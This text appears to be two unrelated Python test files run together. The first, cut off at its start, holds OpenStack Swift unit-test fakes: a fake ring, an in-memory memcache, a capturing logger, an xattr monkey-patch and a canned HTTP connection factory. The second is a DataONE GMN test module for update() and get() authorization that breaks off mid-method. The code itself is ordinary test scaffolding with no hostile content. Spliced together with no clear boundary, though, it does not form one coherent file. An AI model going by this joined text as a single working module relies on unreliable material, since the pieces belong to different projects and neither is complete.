        self._part_shift = 32 - part_power
        # 9 total nodes (6 more past the initial 3) is the cap, no matter if
        # this is set higher, or R^2 for R replicas
        self.set_replicas(replicas)
        self._reload()
    def _reload(self):
        # only refresh the load time; devices are rebuilt by set_replicas
        self._rtime = time.time()
    def set_replicas(self, replicas):
        """Rebuild the device list with one fake device per replica."""
        self.replicas = replicas
        self._devs = []
        for x in range(self.replicas):
            ip = '10.0.0.%s' % x
            port = self._base_port + x
            # round trip through json to ensure unicode like real rings
            self._devs.append(json.loads(json.dumps({
                'ip': ip,
                'replication_ip': ip,
                'port': port,
                'replication_port': port,
                'device': 'sd' + (chr(ord('a') + x)),
                'zone': x % 3,
                'region': x % 2,
                'id': x,
            })))
    @property
    def replica_count(self):
        return self.replicas
    def _get_part_nodes(self, part):
        # every partition maps to all devices, each tagged with its
        # replica index
        return [dict(node, index=i) for i, node in enumerate(list(self._devs))]
    def get_more_nodes(self, part):
        """Yield up to max_more_nodes handoff nodes past the replicas."""
        for x in range(self.replicas, (self.replicas + self.max_more_nodes)):
            yield {'ip': '10.0.0.%s' % x,
                   'replication_ip': '10.0.0.%s' % x,
                   'port': self._base_port + x,
                   'replication_port': self._base_port + x,
                   'device': 'sda',
                   'zone': x % 3,
                   'region': x % 2,
                   'id': x}
def write_fake_ring(path, *devs):
    """
    Pretty much just a two node, two replica, 2 part power ring...

    Serializes a minimal RingData to *path* as a gzipped pickle.  Any
    positional dicts passed in *devs* are merged over the two default
    device entries.
    """
    dev1 = {'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1',
            'port': 6200}
    # id must be 1 (not 0): the replica2part2dev table below references
    # device ids 0 and 1, which must resolve to distinct devices
    dev2 = {'id': 1, 'zone': 0, 'device': 'sdb1', 'ip': '127.0.0.1',
            'port': 6200}
    dev1_updates, dev2_updates = devs or ({}, {})
    dev1.update(dev1_updates)
    dev2.update(dev2_updates)
    replica2part2dev_id = [[0, 1, 0, 1], [1, 0, 1, 0]]
    devs = [dev1, dev2]
    part_shift = 30
    with closing(GzipFile(path, 'wb')) as f:
        pickle.dump(RingData(replica2part2dev_id, devs, part_shift), f)
class FabricatedRing(Ring):
    """
    When a FakeRing just won't do - you can fabricate one to meet
    your tests needs.

    Builds ``devices`` fake devs spread across ``nodes`` IPs and assigns
    device ids to every partition/replica slot round-robin.
    """
    def __init__(self, replicas=6, devices=8, nodes=4, port=6200,
                 part_power=4):
        self.devices = devices
        self.nodes = nodes
        self.port = port
        # honor the caller's replica count; this was previously hard-coded
        # to 6, silently ignoring the ``replicas`` argument
        self.replicas = replicas
        self.part_power = part_power
        self._part_shift = 32 - self.part_power
        self._reload()
    def _reload(self, *args, **kwargs):
        # a far-future _rtime keeps the base Ring from attempting a reload
        self._rtime = time.time() * 2
        if hasattr(self, '_replica2part2dev_id'):
            return
        self._devs = [{
            'region': 1,
            'zone': 1,
            'weight': 1.0,
            'id': i,
            'device': 'sda%d' % i,
            'ip': '10.0.0.%d' % (i % self.nodes),
            'replication_ip': '10.0.0.%d' % (i % self.nodes),
            'port': self.port,
            'replication_port': self.port,
        } for i in range(self.devices)]
        self._replica2part2dev_id = [
            [None] * 2 ** self.part_power
            for i in range(self.replicas)
        ]
        # deal device ids out round-robin across every (replica, part) slot
        dev_ids = itertools.cycle(range(self.devices))
        for p in range(2 ** self.part_power):
            for r in range(self.replicas):
                self._replica2part2dev_id[r][p] = next(dev_ids)
class FakeMemcache(object):
    """Minimal in-process stand-in for swift's memcache client."""

    def __init__(self):
        self.store = {}

    def get(self, key):
        """Return the cached value for *key*, or None when absent."""
        return self.store.get(key)

    def keys(self):
        """Return the currently cached keys."""
        return self.store.keys()

    def set(self, key, value, time=0):
        """Cache *value* under *key*; the *time* ttl is ignored."""
        self.store[key] = value
        return True

    def incr(self, key, time=0):
        """Increment the counter at *key*, creating it at 0 if missing."""
        new_value = self.store.get(key, 0) + 1
        self.store[key] = new_value
        return new_value

    @contextmanager
    def soft_lock(self, key, timeout=0, retries=5):
        """Pretend to take a soft lock; always succeeds immediately."""
        yield True

    def delete(self, key):
        """Remove *key* if cached; always report success."""
        self.store.pop(key, None)
        return True
def readuntil2crlfs(fd):
    """Read single characters from *fd* until two consecutive CRLF pairs.

    Returns everything consumed, including the terminating blank line.
    Raises ValueError if the stream runs dry first.
    """
    collected = ''
    prev = ''
    pairs = 0
    for ch in iter(lambda: fd.read(1), ''):
        collected += ch
        # a CR that is not immediately after an LF restarts the count
        if ch == '\r' and prev != '\n':
            pairs = 0
        if prev == '\r' and ch == '\n':
            pairs += 1
        prev = ch
        if pairs == 2:
            return collected
    raise ValueError("didn't get two CRLFs; just got %r" % collected)
def connect_tcp(hostport):
    """Open and return a (green) TCP socket connected to (host, port)."""
    sock = socket.socket()
    sock.connect(hostport)
    return sock
@contextmanager
def tmpfile(content):
    """Yield the path of a temp file holding str(*content*); unlink after."""
    with NamedTemporaryFile('w', delete=False) as tmp:
        path = tmp.name
        tmp.write(str(content))
    try:
        yield path
    finally:
        os.unlink(path)
# in-memory substitute for filesystem extended attributes, keyed by inode
xattr_data = {}
def _get_inode(fd):
    # accept a path string, a file-like with fileno(), or a raw fd int
    if not isinstance(fd, int):
        try:
            fd = fd.fileno()
        except AttributeError:
            return os.stat(fd).st_ino
    return os.fstat(fd).st_ino
def _setxattr(fd, k, v):
    # store the attribute in the per-inode dict
    inode = _get_inode(fd)
    data = xattr_data.get(inode, {})
    data[k] = v
    xattr_data[inode] = data
def _getxattr(fd, k):
    inode = _get_inode(fd)
    data = xattr_data.get(inode, {}).get(k)
    if not data:
        # mimic the real xattr module's error for a missing attribute
        raise IOError(errno.ENODATA, "Fake IOError")
    return data
import xattr
# monkey-patch the real xattr module so metadata reads/writes in tests hit
# the in-memory store above instead of the filesystem
xattr.setxattr = _setxattr
xattr.getxattr = _getxattr
@contextmanager
def temptree(files, contents=''):
    """Create a temp dir populated with *files*; yield its path, then rm -rf.

    *contents* supplies per-file content positionally; missing entries
    default to the empty string.
    """
    # pad/truncate contents so it lines up one-to-one with files
    count = len(files)
    padded = (list(contents) + [''] * count)[:count]
    tempdir = mkdtemp()
    for rel_path, body in zip(files, padded):
        # absolute paths are re-rooted inside the temp dir
        if os.path.isabs(rel_path):
            rel_path = '.' + rel_path
        target = os.path.join(tempdir, rel_path)
        parent = os.path.dirname(target)
        if not os.path.exists(parent):
            os.makedirs(parent)
        with open(target, 'w') as f:
            f.write(str(body))
    try:
        yield tempdir
    finally:
        rmtree(tempdir)
def with_tempdir(f):
    """
    Decorator to give a single test a tempdir as argument to test method.
    """
    @functools.wraps(f)
    def inner(*args, **kwargs):
        scratch = mkdtemp()
        try:
            # tempdir is appended as the final positional argument
            return f(*(list(args) + [scratch]), **kwargs)
        finally:
            rmtree(scratch)
    return inner
class NullLoggingHandler(logging.Handler):
    """A logging handler that silently discards every record."""
    def emit(self, record):
        # intentionally drop the record
        pass
class UnmockTimeModule(object):
    """
    Even if a test mocks time.time - you can restore unmolested behavior in
    another module that imports time directly, by monkey patching its
    imported reference to the module with an instance of this class.
    """
    # captured at class-definition time, before any test gets to mock it
    _orig_time = time.time
    def __getattribute__(self, name):
        # serve the pristine time() for 'time'; delegate everything else
        if name == 'time':
            return UnmockTimeModule._orig_time
        return getattr(time, name)
# logging.LogRecord.__init__ calls time.time
logging.time = UnmockTimeModule()
class WARN_DEPRECATED(Exception):
    """Raised (and echoed to stdout) when a deprecated method is used."""

    def __init__(self, msg):
        self.msg = msg
        print(msg)
class FakeLogger(logging.Logger, object):
    # a thread safe fake logger
    def __init__(self, *args, **kwargs):
        # NOTE: deliberately does not call logging.Logger.__init__;
        # the attributes Logger internals need are set up by hand here
        self._clear()
        self.name = 'swift.unit.fake_logger'
        self.level = logging.NOTSET
        if 'facility' in kwargs:
            self.facility = kwargs['facility']
        self.statsd_client = None
        self.thread_locals = None
        self.parent = None
    # maps log levels to the log_dict bucket names used by _log()
    store_in = {
        logging.ERROR: 'error',
        logging.WARNING: 'warning',
        logging.INFO: 'info',
        logging.DEBUG: 'debug',
        logging.CRITICAL: 'critical',
        NOTICE: 'notice',
    }
    def warn(self, *args, **kwargs):
        # the deprecated alias is forbidden outright in tests
        raise WARN_DEPRECATED("Deprecated Method warn use warning instead")
    def notice(self, msg, *args, **kwargs):
        """
        Convenience function for syslog priority LOG_NOTICE. The python
        logging lvl is set to 25, just above info. SysLogHandler is
        monkey patched to map this log lvl to the LOG_NOTICE syslog
        priority.
        """
        self.log(NOTICE, msg, *args, **kwargs)
    def _log(self, level, msg, *args, **kwargs):
        # record the raw call in log_dict, then defer to the real Logger
        # machinery so handle()/_handle() capture the formatted line too
        store_name = self.store_in[level]
        cargs = [msg]
        if any(args):
            cargs.extend(args)
        captured = dict(kwargs)
        # snapshot exc_info now, as the real logger would
        if 'exc_info' in kwargs and \
                not isinstance(kwargs['exc_info'], tuple):
            captured['exc_info'] = sys.exc_info()
        self.log_dict[store_name].append((tuple(cargs), captured))
        super(FakeLogger, self)._log(level, msg, *args, **kwargs)
    def _clear(self):
        # reset both capture structures; lines_dict keys mirror store_in
        self.log_dict = defaultdict(list)
        self.lines_dict = {'critical': [], 'error': [], 'info': [],
                           'warning': [], 'debug': [], 'notice': []}
    clear = _clear  # this is a public interface
    def get_lines_for_level(self, level):
        """Return the formatted lines captured at *level*."""
        if level not in self.lines_dict:
            raise KeyError(
                "Invalid log level '%s'; valid levels are %s" %
                (level,
                 ', '.join("'%s'" % lvl for lvl in sorted(self.lines_dict))))
        return self.lines_dict[level]
    def all_log_lines(self):
        """Return {level: lines} for only the levels that captured lines."""
        return dict((level, msgs) for level, msgs in self.lines_dict.items()
                    if len(msgs) > 0)
    def _store_in(store_name):
        # class-body factory: builds a stub that records calls in log_dict
        def stub_fn(self, *args, **kwargs):
            self.log_dict[store_name].append((args, kwargs))
        return stub_fn
    # mock out the StatsD logging methods:
    update_stats = _store_in('update_stats')
    increment = _store_in('increment')
    decrement = _store_in('decrement')
    timing = _store_in('timing')
    timing_since = _store_in('timing_since')
    transfer_rate = _store_in('transfer_rate')
    set_statsd_prefix = _store_in('set_statsd_prefix')
    def get_increments(self):
        # first positional arg of each increment() call is the metric name
        return [call[0][0] for call in self.log_dict['increment']]
    def get_increment_counts(self):
        """Return {metric: count} aggregated from increment() calls."""
        counts = {}
        for metric in self.get_increments():
            if metric not in counts:
                counts[metric] = 0
            counts[metric] += 1
        return counts
    def setFormatter(self, obj):
        self.formatter = obj
    def close(self):
        self._clear()
    def set_name(self, name):
        # don't touch _handlers
        self._name = name
    def acquire(self):
        pass
    def release(self):
        pass
    def createLock(self):
        pass
    def emit(self, record):
        pass
    def _handle(self, record):
        # acts as its own handler: format the record and file the line
        # into lines_dict under the lowercase level name
        try:
            line = record.getMessage()
        except TypeError:
            print('WARNING: unable to format log message %r %% %r' % (
                record.msg, record.args))
            raise
        self.lines_dict[record.levelname.lower()].append(line)
    def handle(self, record):
        self._handle(record)
    def flush(self):
        pass
    def handleError(self, record):
        pass
class DebugSwiftLogFormatter(utils.SwiftLogFormatter):
    """SwiftLogFormatter variant that expands '#012' back into newlines."""
    def format(self, record):
        msg = super(DebugSwiftLogFormatter, self).format(record)
        return msg.replace('#012', '\n')
class DebugLogger(FakeLogger):
    """A simple stdout logging version of FakeLogger"""
    def __init__(self, *args, **kwargs):
        FakeLogger.__init__(self, *args, **kwargs)
        self.formatter = DebugSwiftLogFormatter(
            "%(server)s %(levelname)s: %(message)s")
    def handle(self, record):
        # capture like FakeLogger, but also echo the formatted line
        self._handle(record)
        print(self.formatter.format(record))
class DebugLogAdapter(utils.LogAdapter):
    """LogAdapter that forwards StatsD-style calls to the wrapped logger."""
    def _send_to_logger(name):
        # class-body factory: builds a passthrough to self.logger.<name>
        def stub_fn(self, *args, **kwargs):
            return getattr(self.logger, name)(*args, **kwargs)
        return stub_fn
    # delegate to FakeLogger's mocks
    update_stats = _send_to_logger('update_stats')
    increment = _send_to_logger('increment')
    decrement = _send_to_logger('decrement')
    timing = _send_to_logger('timing')
    timing_since = _send_to_logger('timing_since')
    transfer_rate = _send_to_logger('transfer_rate')
    set_statsd_prefix = _send_to_logger('set_statsd_prefix')
    def __getattribute__(self, name):
        # anything not defined here falls through to the wrapped logger
        try:
            return object.__getattribute__(self, name)
        except AttributeError:
            return getattr(self.__dict__['logger'], name)
def debug_logger(name='test'):
    """Return a DebugLogAdapter wrapping a fresh DebugLogger under *name*."""
    return DebugLogAdapter(DebugLogger(), name)
# keep a reference to the real handler class so its constants survive
original_syslog_handler = logging.handlers.SysLogHandler
def fake_syslog_handler():
    """Swap FakeLogger in for SysLogHandler, copying its LOG_* constants."""
    for attr in dir(original_syslog_handler):
        if attr.startswith('LOG'):
            setattr(FakeLogger, attr,
                    copy.copy(getattr(logging.handlers.SysLogHandler, attr)))
    FakeLogger.priority_map = \
        copy.deepcopy(logging.handlers.SysLogHandler.priority_map)
    logging.handlers.SysLogHandler = FakeLogger
# only install the fake when the unit_test config opts in
if utils.config_true_value(
        get_config('unit_test').get('fake_syslog', 'False')):
    fake_syslog_handler()
class MockTrue(object):
    """
    A truthy chameleon: an instance compares equal to True, and any
    attribute access or call on it just yields the instance again.

    >>> thing = MockTrue()
    >>> thing
    True
    >>> thing == True  # True == True
    True
    >>> thing == False  # True == False
    False
    >>> thing != True  # True != True
    False
    >>> thing != False  # True != False
    True
    >>> thing.attribute
    True
    >>> thing.method()
    True
    >>> thing.attribute.method()
    True
    >>> thing.method().attribute
    True
    """
    def __getattribute__(self, *args, **kwargs):
        # every attribute, including methods, resolves to the instance
        return self
    def __call__(self, *args, **kwargs):
        # calling the instance also yields the instance
        return self
    def __repr__(self, *args, **kwargs):
        return repr(True)
    def __eq__(self, other):
        return other is True
    def __ne__(self, other):
        return other is not True
@contextmanager
def mock(update):
    """Temporarily set dotted-path attributes; undo everything on exit.

    *update* maps ``'pkg.mod.attr'`` to a replacement value.  Attributes
    that already existed are restored afterwards; ones this call created
    are deleted.
    """
    restore = []
    created = []
    for dotted, replacement in update.items():
        parts = dotted.split('.')
        attr = parts.pop(-1)
        # resolve the owning module/object of the final attribute
        target = __import__(parts[0], fromlist=parts[1:])
        for name in parts[1:]:
            target = getattr(target, name)
        if hasattr(target, attr):
            restore.append((target, attr, getattr(target, attr)))
        else:
            created.append((target, attr))
        setattr(target, attr, replacement)
    try:
        yield True
    finally:
        for target, attr, old_value in restore:
            setattr(target, attr, old_value)
        for target, attr in created:
            delattr(target, attr)
class FakeStatus(object):
    """
    This will work with our fake_http_connect, if you hand in one of these
    instead of a status int or status int tuple to the "codes" iter you can
    add some eventlet sleep to the expect and response stages of the
    connection.
    """
    def __init__(self, status, expect_sleep=None, response_sleep=None):
        """
        :param status: the response status int, or a tuple of
                       ([expect_status, ...], response_status)
        :param expect_sleep: float, time to eventlet sleep during expect, can
                             be a iter of floats
        :param response_sleep: float, time to eventlet sleep during response
        """
        # connect exception
        if isinstance(status, (Exception, eventlet.Timeout)):
            raise status
        if isinstance(status, tuple):
            # explicit ([expect, ...], final) form
            self.expect_status = list(status[:-1])
            self.status = status[-1]
            self.explicit_expect_list = True
        else:
            self.expect_status, self.status = ([], status)
            self.explicit_expect_list = False
        if not self.expect_status:
            # when a swift backend service returns a status before reading
            # from the body (mostly an error response) eventlet.wsgi will
            # respond with that status line immediately instead of 100
            # Continue, even if the client sent the Expect 100 header.
            # BufferedHttp and the proxy both see these error statuses
            # when they call getexpect, so our FakeConn tries to act like
            # our backend services and return certain types of responses
            # as expect statuses just like a real backend server would do.
            if self.status in (507, 412, 409):
                self.expect_status = [status]
            else:
                self.expect_status = [100, 100]
        # setup sleep attributes
        # normalize expect_sleep into a list padded with None so it lines
        # up one-to-one with expect_status
        if not isinstance(expect_sleep, (list, tuple)):
            expect_sleep = [expect_sleep] * len(self.expect_status)
        self.expect_sleep_list = list(expect_sleep)
        while len(self.expect_sleep_list) < len(self.expect_status):
            self.expect_sleep_list.append(None)
        self.response_sleep = response_sleep
    def get_response_status(self):
        """Sleep if configured, then return (or raise) the final status."""
        if self.response_sleep is not None:
            eventlet.sleep(self.response_sleep)
        if self.expect_status and self.explicit_expect_list:
            raise Exception('Test did not consume all fake '
                            'expect status: %r' % (self.expect_status,))
        if isinstance(self.status, (Exception, eventlet.Timeout)):
            raise self.status
        return self.status
    def get_expect_status(self):
        """Pop and return (or raise) the next expect status, sleeping first."""
        expect_sleep = self.expect_sleep_list.pop(0)
        if expect_sleep is not None:
            eventlet.sleep(expect_sleep)
        expect_status = self.expect_status.pop(0)
        if isinstance(expect_status, (Exception, eventlet.Timeout)):
            raise expect_status
        return expect_status
class SlowBody(object):
    """
    This will work with our fake_http_connect, if you hand in these
    instead of strings it will make reads take longer by the given
    amount. It should be a little bit easier to extend than the
    current slow kwarg - which inserts whitespace in the response.
    Also it should be easy to detect if you have one of these (or a
    subclass) for the body inside of FakeConn if we wanted to do
    something smarter than just duck-type the str/buffer api
    enough to get by.
    """
    def __init__(self, body, slowness):
        self.body = body
        self.slowness = slowness
    def slowdown(self):
        eventlet.sleep(self.slowness)
    def __getitem__(self, s):
        # slicing yields another SlowBody so the slowness is preserved
        return SlowBody(self.body[s], self.slowness)
    def __len__(self):
        return len(self.body)
    def __radd__(self, other):
        # consumers build responses via string concatenation; sleep per read
        self.slowdown()
        return other + self.body
def fake_http_connect(*code_iter, **kwargs):
    """Return a replacement for http_connect that replays canned responses.

    Each positional argument programs the status for one connection, in the
    order connections are made. A status may be an int, a FakeStatus, an
    Exception/Timeout instance, or a non-positive int (connect then raises
    HTTPException).

    Recognized kwargs (all optional): 'timestamps', 'etags', 'headers',
    'expect_headers', 'missing_container' (scalars or per-connection
    sequences), 'body', 'body_iter', 'count', 'slow', 'slow_connect',
    'raise_exc', 'raise_timeout_exc', and observer callbacks
    'give_connect', 'give_send', 'give_expect', 'give_content_type'.
    """
    class FakeConn(object):
        # In-process stand-in for an HTTP connection object.
        def __init__(self, status, etag=None, body='', timestamp='1',
                     headers=None, expect_headers=None, connection_id=None,
                     give_send=None, give_expect=None):
            if not isinstance(status, FakeStatus):
                status = FakeStatus(status)
            self._status = status
            self.reason = 'Fake'
            self.host = '1.2.3.4'
            self.port = '1234'
            self.sent = 0
            self.received = 0
            self.etag = etag
            self.body = body
            self.headers = headers or {}
            self.expect_headers = expect_headers or {}
            self.timestamp = timestamp
            self.connection_id = connection_id
            self.give_send = give_send
            self.give_expect = give_expect
            self.closed = False
            # A list-valued 'slow' kwarg assigns one sleep per connection.
            if 'slow' in kwargs and isinstance(kwargs['slow'], list):
                try:
                    self._next_sleep = kwargs['slow'].pop(0)
                except IndexError:
                    self._next_sleep = None
            # be nice to trixy bits with node_iter's
            eventlet.sleep()
        def getresponse(self):
            # Raise any programmed exception before yielding the status.
            exc = kwargs.get('raise_exc')
            if exc:
                if isinstance(exc, (Exception, eventlet.Timeout)):
                    raise exc
                raise Exception('test')
            if kwargs.get('raise_timeout_exc'):
                raise eventlet.Timeout()
            self.status = self._status.get_response_status()
            return self
        def getexpect(self):
            # Model the 100-continue handshake: return a FakeConn carrying
            # the next programmed expect status.
            if self.give_expect:
                self.give_expect(self)
            expect_status = self._status.get_expect_status()
            headers = dict(self.expect_headers)
            if expect_status == 409:
                headers['X-Backend-Timestamp'] = self.timestamp
            response = FakeConn(expect_status,
                                timestamp=self.timestamp,
                                headers=headers)
            response.status = expect_status
            return response
        def getheaders(self):
            # Build a plausible backend response header set; the etag is
            # derived from the body unless one was programmed explicitly.
            etag = self.etag
            if not etag:
                if isinstance(self.body, str):
                    etag = '"' + md5(self.body).hexdigest() + '"'
                else:
                    etag = '"68b329da9893e34099c7d8ad5cb9c940"'
            headers = HeaderKeyDict({
                'content-length': len(self.body),
                'content-type': 'x-application/test',
                'x-timestamp': self.timestamp,
                'x-backend-timestamp': self.timestamp,
                'last-modified': self.timestamp,
                'x-object-meta-test': 'testing',
                'x-delete-at': '9876543210',
                'etag': etag,
                'x-works': 'yes',
            })
            if self.status // 100 == 2:
                headers['x-account-container-count'] = \
                    kwargs.get('count', 12345)
            if not self.timestamp:
                # when timestamp is None, HeaderKeyDict raises KeyError
                headers.pop('x-timestamp', None)
            try:
                if next(container_ts_iter) is False:
                    headers['x-container-timestamp'] = '1'
            except StopIteration:
                pass
            am_slow, value = self.get_slow()
            if am_slow:
                # Slow mode dribbles out four single-space bytes (see read).
                headers['content-length'] = '4'
            headers.update(self.headers)
            return headers.items()
        def get_slow(self):
            # Return (is_slow, sleep_seconds) based on the 'slow' kwarg,
            # which may be a per-connection list, a number, or a flag.
            if 'slow' in kwargs and isinstance(kwargs['slow'], list):
                if self._next_sleep is not None:
                    return True, self._next_sleep
                else:
                    return False, 0.01
            if kwargs.get('slow') and isinstance(kwargs['slow'], Number):
                return True, kwargs['slow']
            return bool(kwargs.get('slow')), 0.1
        def read(self, amt=None):
            # In slow mode, emit up to four single spaces, sleeping before
            # each, then fall through to the real body.
            am_slow, value = self.get_slow()
            if am_slow:
                if self.sent < 4:
                    self.sent += 1
                    eventlet.sleep(value)
                    return ' '
            rv = self.body[:amt]
            self.body = self.body[amt:]
            return rv
        def send(self, data=None):
            if self.give_send:
                self.give_send(self, data)
            am_slow, value = self.get_slow()
            if am_slow:
                if self.received < 4:
                    self.received += 1
                    eventlet.sleep(value)
        def getheader(self, name, default=None):
            return HeaderKeyDict(self.getheaders()).get(name, default)
        def close(self):
            self.closed = True
    # Per-connection iterators; scalar kwargs are broadcast across all
    # programmed connections.
    timestamps_iter = iter(kwargs.get('timestamps') or ['1'] * len(code_iter))
    etag_iter = iter(kwargs.get('etags') or [None] * len(code_iter))
    if isinstance(kwargs.get('headers'), (list, tuple)):
        headers_iter = iter(kwargs['headers'])
    else:
        headers_iter = iter([kwargs.get('headers', {})] * len(code_iter))
    if isinstance(kwargs.get('expect_headers'), (list, tuple)):
        expect_headers_iter = iter(kwargs['expect_headers'])
    else:
        expect_headers_iter = iter([kwargs.get('expect_headers', {})] *
                                   len(code_iter))
    x = kwargs.get('missing_container', [False] * len(code_iter))
    if not isinstance(x, (tuple, list)):
        x = [x] * len(code_iter)
    container_ts_iter = iter(x)
    code_iter = iter(code_iter)
    conn_id_and_code_iter = enumerate(code_iter)
    static_body = kwargs.get('body', None)
    body_iter = kwargs.get('body_iter', None)
    if body_iter:
        body_iter = iter(body_iter)
    def connect(*args, **ckwargs):
        # The actual http_connect replacement handed back to the caller.
        if kwargs.get('slow_connect', False):
            eventlet.sleep(0.1)
        if 'give_content_type' in kwargs:
            # args[6] is the headers dict in the http_connect signature.
            if len(args) >= 7 and 'Content-Type' in args[6]:
                kwargs['give_content_type'](args[6]['Content-Type'])
            else:
                kwargs['give_content_type']('')
        i, status = next(conn_id_and_code_iter)
        if 'give_connect' in kwargs:
            give_conn_fn = kwargs['give_connect']
            argspec = inspect.getargspec(give_conn_fn)
            # Only pass connection_id if the callback can accept it.
            if argspec.keywords or 'connection_id' in argspec.args:
                ckwargs['connection_id'] = i
            give_conn_fn(*args, **ckwargs)
        etag = next(etag_iter)
        headers = next(headers_iter)
        expect_headers = next(expect_headers_iter)
        timestamp = next(timestamps_iter)
        if status <= 0:
            raise HTTPException()
        if body_iter is None:
            body = static_body or ''
        else:
            body = next(body_iter)
        return FakeConn(status, etag, body=body, timestamp=timestamp,
                        headers=headers, expect_headers=expect_headers,
                        connection_id=i, give_send=kwargs.get('give_send'),
                        give_expect=kwargs.get('give_expect'))
    # Expose the remaining statuses so tests can assert all were consumed.
    connect.code_iter = code_iter
    return connect
@contextmanager
def mocked_http_conn(*args, **kwargs):
    """Patch bufferedhttp's http_connect_raw with a fake connection factory.

    Yields the factory, which also carries a ``requests`` list recording
    every connection attempt. On exit, raises AssertionError if any
    programmed status codes were left unconsumed.
    """
    captured = []

    def record(ip, port, method, path, headers, qs, ssl):
        captured.append({
            'ip': ip,
            'port': port,
            'method': method,
            'path': path,
            'headers': headers,
            'qs': qs,
            'ssl': ssl,
        })

    kwargs.setdefault('give_connect', record)
    fake_conn = fake_http_connect(*args, **kwargs)
    fake_conn.requests = captured
    with mocklib.patch('swift.common.bufferedhttp.http_connect_raw',
                       new=fake_conn):
        yield fake_conn
        unused = list(fake_conn.code_iter)
        if unused:
            raise AssertionError('left over status %r' % unused)
def make_timestamp_iter():
    """Return an endless iterator of increasing Timestamps, one per second,
    starting from the current wall-clock time."""
    start = int(time.time())
    return iter(Timestamp(t) for t in itertools.count(start))
class Timeout(object):
    """Context manager that aborts its block after ``seconds`` seconds.

    Implemented with SIGALRM, so it only works on the main thread of
    Unix-like platforms.
    """
    def __init__(self, seconds):
        self.seconds = seconds

    def __enter__(self):
        # Arm the alarm; _exit fires if the block runs too long.
        signal.signal(signal.SIGALRM, self._exit)
        signal.alarm(self.seconds)

    def __exit__(self, type, value, traceback):
        # Disarm on the way out, whether or not the body finished early.
        signal.alarm(0)

    def _exit(self, signum, frame):
        class TimeoutException(Exception):
            pass
        raise TimeoutException
def requires_o_tmpfile_support(func):
    """Decorator: skip the wrapped test unless O_TMPFILE is available."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        if utils.o_tmpfile_supported():
            return func(*args, **kwargs)
        raise SkipTest('Requires O_TMPFILE support')
    return wrapper
|
|
#!/usr/bin/env python
# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test MNStorage.update() and MNRead.get() without SID.
The access control subsystem is mostly shared between the MNStorage methods, so most of
it is tested in MNStorage.create().
"""
import io
import time
import freezegun
import pytest
import responses
import d1_common.types.exceptions
import d1_gmn.tests.gmn_mock
import d1_gmn.tests.gmn_test_case
import d1_test.d1_test_case
import d1_test.instance_generator.identifier
@d1_test.d1_test_case.reproducible_random_decorator("TestUpdateWithoutSid")
@freezegun.freeze_time("1955-05-15")
class TestUpdateWithoutSid(d1_gmn.tests.gmn_test_case.GMNTestCase):
    """Tests of MNStorage.update() and MNRead.get() authorization and system
    metadata handling.

    Time is frozen and randomness made reproducible so generated objects and
    sampled results are stable across runs.
    """
    @responses.activate
    def test_1000(self, gmn_client_v1_v2):
        """update(): Raises NotAuthorized if none of the trusted subjects are in the
        session."""
        pid, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
            gmn_client_v1_v2, sid=True
        )
        # Session subjects and trusted subjects are disjoint here.
        with pytest.raises(d1_common.types.exceptions.NotAuthorized):
            self.update_obj(
                gmn_client_v1_v2,
                pid,
                session_subj_list=["subj1", "subj2", "subj3"],
                trusted_subj_list=["subj4", "subj5"],
                disable_auth=False,
            )
    @responses.activate
    def test_1010(self, gmn_client_v1_v2):
        """update(): Non-existing object raises NotFound."""
        with pytest.raises(d1_common.types.exceptions.NotFound):
            self.get_obj(gmn_client_v1_v2, "_invalid_pid_")
    @responses.activate
    def test_1020(self, gmn_client_v1_v2):
        """update(): updates the object if one or more trusted subjects are in the
        session."""
        pid, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
            gmn_client_v1_v2, sid=True
        )
        # "subj2" appears in both lists, which is sufficient authorization.
        self.update_obj(
            gmn_client_v1_v2,
            pid,
            session_subj_list=["subj1", "subj2", "subj3"],
            trusted_subj_list=["subj2", "subj5"],
            disable_auth=False,
        )
    @responses.activate
    def test_1030(self, gmn_client_v1_v2):
        """update() / get(): Object with no explicit permissions can be retrieved by a
        trusted subject."""
        pid, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
            gmn_client_v1_v2, sid=True
        )
        pid, sid, sciobj_bytes, sysmeta_pyxb = self.update_obj(gmn_client_v1_v2, pid)
        self.get_obj(
            gmn_client_v1_v2,
            pid,
            session_subj_list=["subj1", "subj2", "session_and_trusted_subj"],
            trusted_subj_list=["session_and_trusted_subj", "subj4"],
            disable_auth=False,
        )
    @responses.activate
    def test_1040(self, gmn_client_v1_v2):
        """update() / get(): Object with no explicit permissions cannot be retrieved by
        non-trusted subjects."""
        pid, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
            gmn_client_v1_v2, sid=True
        )
        pid, sid, sciobj_bytes, sysmeta_pyxb = self.update_obj(
            gmn_client_v1_v2, pid, permission_list=None
        )
        # No overlap between session and trusted subjects -> denied.
        with pytest.raises(d1_common.types.exceptions.NotAuthorized):
            self.get_obj(
                gmn_client_v1_v2,
                pid,
                session_subj_list=["subj1", "subj2", "shared_subj", "subj4"],
                trusted_subj_list=["subj5", "subj6"],
                disable_auth=False,
            )
    @responses.activate
    def test_1050(self, gmn_client_v1_v2):
        """update() / get(): Object with no explicit permissions cannot be retrieved by
        the submitter."""
        pid, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
            gmn_client_v1_v2, sid=True
        )
        pid, sid, sciobj_bytes, sysmeta_pyxb = self.update_obj(
            gmn_client_v1_v2, pid, permission_list=None
        )
        # Even the submitter gets NotAuthorized without explicit permissions.
        with pytest.raises(d1_common.types.exceptions.NotAuthorized):
            self.get_obj(
                gmn_client_v1_v2,
                pid,
                session_subj_list=[sysmeta_pyxb.submitter.value()],
                trusted_subj_list=None,
                disable_auth=False,
            )
    @responses.activate
    def test_1060(self, gmn_client_v1_v2):
        """update() of object records an update event on the obsoleted object and a
        create event on the new object."""
        with d1_gmn.tests.gmn_mock.disable_auth():
